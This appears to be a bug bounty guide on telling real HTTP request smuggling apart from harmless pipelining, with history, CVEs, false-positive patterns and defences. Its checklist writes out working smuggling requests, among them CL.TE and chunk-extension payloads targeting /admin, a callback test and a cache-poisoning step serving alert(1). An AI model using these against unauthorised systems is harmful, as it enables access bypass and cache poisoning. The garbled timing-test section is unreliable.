HTTP Request Smuggling in 2025: How to Distinguish Real Desync Vulnerabilities from HTTP Request Pipelining (And Stop Wasting Everyone’s Time)
- Introduction
- What Is HTTP Request Pipelining? (The Feature, Not the Bug)
- What Is HTTP Request Smuggling / Desync? (The Actual Vulnerability)
- The History of HTTP Request Smuggling (2005 → 2025)
- Why the 2025 Wave of Invalid Reports Is Even Larger
- Bulletproof Verification Checklist (Updated for 2025 Vectors)
- Common False Positive Patterns in 2025 Reports
- Real-World 2025 Examples & CVEs
- Defensive Recommendations for 2025
- Frequently Asked Questions
- Conclusion
Introduction
- A world-class researcher (James Kettle) drops a mind-blowing talk on HTTP request smuggling / desync attacks.
- Bug bounty platforms are immediately flooded with “Critical – HTTP Request Smuggling” reports.
- 90–95 % of them are… HTTP/1.1 pipelining doing exactly what the RFC says it should.
We saw this in 2019 after James popularized modern desync attacks. We saw it again in 2024 after his Black Hat briefing on novel obfuscation techniques. And yes — we are still seeing it in November 2025, months after his DEF CON / Black Hat 2025 presentation “HTTP/1.1 Must Die: The Desync Endgame”, which introduced parser-discrepancy detection, browser-powered desync, and chunk-extension tricks that bypass most existing defenses.
The new techniques are fantastic and have already produced dozens of CVEs (CVE-2025-32094, CVE-2025-55315, CVE-2025-43859, etc.), but they have also created another tsunami of duplicate/invalid reports.
This extended guide is written for:
- Bug bounty hunters who want valid, high-severity findings (and bigger bounties)
- Junior pentesters who keep getting “Informative” on their smuggling reports
- Security engineers triaging reports and pulling their hair out
By the end, you’ll be able to separate real HTTP request smuggling from harmless pipelining in under five minutes — even against the newest 2025 vectors.
What Is HTTP Request Pipelining? (The Feature, Not the Bug)
HTTP/1.1 pipelining, defined in RFC 2616 §8.1.2.2 (and refined in RFC 9112), allows a client to send multiple requests on the same connection without waiting for each response. The server must process them sequentially and respond in the same order.
GET /page1 HTTP/1.1
Host: example.com
GET /page2 HTTP/1.1
Host: example.comThe wire shows both requests concatenated — perfectly normal.
Key characteristics of pure pipelining (no vulnerability):
- Both requests are complete and valid
- Back-end processes them in FIFO order
- No response queue poisoning, cache poisoning, or bypass occurs
- Disappears when you add
Connection: closeor disable pipelining in Burp/ZAP
If your “smuggling” proof is just “I saw two requests stuck together in Repeater”, congratulations — you rediscovered a 1999 performance feature.
What Is HTTP Request Smuggling / Desync? (The Actual Vulnerability)
HTTP request smuggling occurs when a front-end (CDN, reverse proxy, load balancer) and back-end disagree on request boundaries. This disagreement lets an attacker “smuggle” part of their request into the next user’s request stream.
Classic vectors (still relevant in 2025):
| Variant | Front-end uses | Back-end uses | Typical trigger |
|---|---|---|---|
| CL.TE | Content-Length | Transfer-Encoding | Content-Length: 4\r\n\r\n0\r\n\r\nGET /admin |
| TE.CL | Transfer-Encoding | Content-Length | Chunked body that underflows CL |
New 2025-era vectors (from Kettle’s latest research):
- Chunk-extension exploits (
0;foo=bar\r\n\r\n) - Obsolete line-folding in headers
- Parser discrepancy detection (different handling of whitespace, case, etc.)
- Browser-powered desync (using victim browsers as delivery vehicles)
- HTTP/2 downgrade attacks with novel header smuggling
Proof of a real desync always requires observable impact, such as:
- The smuggled prefix is executed against another user’s session
- Cache poisoning (malicious response cached by CDN)
- WebSocket/SSE hijacking
- Internal API access / firewall bypass
If you cannot demonstrate one of those, it is not smuggling.
The History of HTTP Request Smuggling (2005 → 2025)
| Year | Milestone | Impact |
|---|---|---|
| 2005 | First public disclosure (Watcher, Sanctum) | Mostly theoretical |
| 2019 | James Kettle – “HTTP Desync Attacks: Smashing into the Cell Next Door” | Modern revival, hundreds of real-world bugs |
| 2021 | HTTP/2-specific request smuggling | Forced industry to rethink HTTP/2 safety |
| 2024 | New obfuscation techniques bypassing WAF regex | Another report wave |
| 2025 | “HTTP/1.1 Must Die” – parser-discrepancy scanning, browser-powered desync, chunk extensions | New CVEs in Akamai, ASP.NET, h11 library, Cloudflare, etc. |
Despite HTTP/2 and HTTP/3 adoption, many enterprises still terminate to HTTP/1.1 back-ends — keeping the attack surface alive.
Why the 2025 Wave of Invalid Reports Is Even Larger
Most invalid reports follow this exact recipe:
- Researcher updates Burp to 2025.10+ (new HTTP Request Smuggler v3 with parser-discrepancy mode)
- Runs automated scan → gets dozens of “Probable” hits
- Copies raw concatenated requests into report without manual verification
- Submits “Critical – HTTP Request Smuggling
The new scanner is brilliant at finding leads, but “Probable” ≠ “Confirmed”. You still need manual confirmation of desynchronization.
Bulletproof Verification Checklist (Updated for 2025 Vectors)
Use this exact process every single time.
Phase 1 – Confirm Basic Pipelining Works
GET /ping1 HTTP/1.1
Host: target.com
GET /ping2 HTTP/1.1
Host: target.com
Connection: closeBoth responses → pipelining supported.
Phase 2 – Classic CL.TE Test (still catches many in 2025)
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked
0
GET /admin HTTP/1.1
X: x
Connection: closePhase 3 – 2025 Chunk-Extension Variant
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
10;foo=bar
SMUGGLED_DATA_HERE
0;discard-this=junk
GET /admin HTTP/1.1
Host: target.com
Connection: closePhase 4 – Proof of Desync (Mandatory)
Method A – Dual Connection Test (Gold Standard)
- Open Burp Collaborator or interactsh.com
- Send smuggling payload ending with
GET /?cb=ATTACKER.colab - Immediately send normal request from another browser/IP ending with
GET /?cb=VICTIM.colab - If VICTIM gets ATTACKER’s callback → confirmed desync
Method B – Timing Attack (When Collaborator Blocked)
POST / HTTP/1.1
Host: target.com
Transfer-Encoding: chunked
G[garbage to make chunk size match CL if needed]
0 GET /delay/15s HTTP/1.1 Host: target.com Foo: attacker GET /instant HTTP/1.1 Host: target.com Connection: close
Real desync → /instant returns immediately
Pipelining → waits full 15 seconds
Method C – Cache Poisoning Test (DoS-friendly)
Smuggle GET /static/style.css returning alert(1) and refresh shared cache page.
Phase 5 – Use 2025 Tools Correctly
- Burp Suite 2025.10+ → HTTP Request Smuggler v3 → “Launch Smuggle probe” → look for Confirmed, not just “Probable”
- Enable “Parser Discrepancy” mode for the newest vectors
- Turbo Intruder with Kettle’s latest scripts from GitHub.com/albinowax
If the tool only says “Probable” and your manual tests fail → pipelining.
Common False Positive Patterns in 2025 Reports
| Symptom Reported | Actual Cause | Why It’s Not Smuggling |
|---|---|---|
| Two requests appear concatenated in raw view | Pipelining enabled in client | Expected HTTP/1.1 behavior |
| Server returns 400 after chunked request | Front-end rejects chunked but back-end accepts | No desync, just rejection |
| “Transfer-Encoding: chunked” reflected in response | Normal echo or debug header | No boundary disagreement |
| HTTP/2 request shows stream IDs merged | HTTP/2 downgrade to 1.1 pipelining | Not smuggling unless proven impact |
Real-World 2025 Examples & CVEs
- CVE-2025-32094 – Akamai OPTIONS + obsolete line folding
- CVE-2025-55315 – ASP.NET Kestrel chunk-extension parsing inconsistency
- CVE-2025-43859 – Python h11 library lenient line folding
- Multiple Cloudflare Workers edge cases fixed silently after Kettle’s disclosure
These were found using the new parser-discrepancy technique — not by sending classic CL.TE payloads.
Defensive Recommendations for 2025
- Normalize headers at the edge – reject
Transfer-EncodingifContent-Lengthpresent (or vice-versa) - Use HTTP/2 or HTTP/3 end-to-end where possible
- Deploy tools that understand 2025 vectors – latest Cloudflare WAF rules, AWS Shield Advanced updates, Akamai Kona patches
- Run Burp DAST or HTTP Request Smuggler in CI/CD to catch regressions
Frequently Asked Questions
Q: “But Burp said ‘Probable’ – isn’t that enough?”
A: No. Probable means a lead. You must confirm impact.
Q: “The target uses HTTP/2, how can it be vulnerable?”
A: Many HTTP/2 implementations downgrade to HTTP/1.1 for certain paths or errors — still vulnerable.
Q: “I got a 400 but the next request was poisoned!”
A: That’s a confirmed desync — well done.
Conclusion
HTTP request pipelining is a feature that has existed for 26 years.
HTTP request smuggling is a critical vulnerability that requires proven front/back-end disagreement and impact.
In 2025 we have better tools and scarier vectors than ever — but the fundamentals of verification have not changed.
Before you submit your next “Critical – HTTP Request Smuggling” report, run the checklist above. Your triage team (and your reputation) will thank you.
Happy responsible hunting.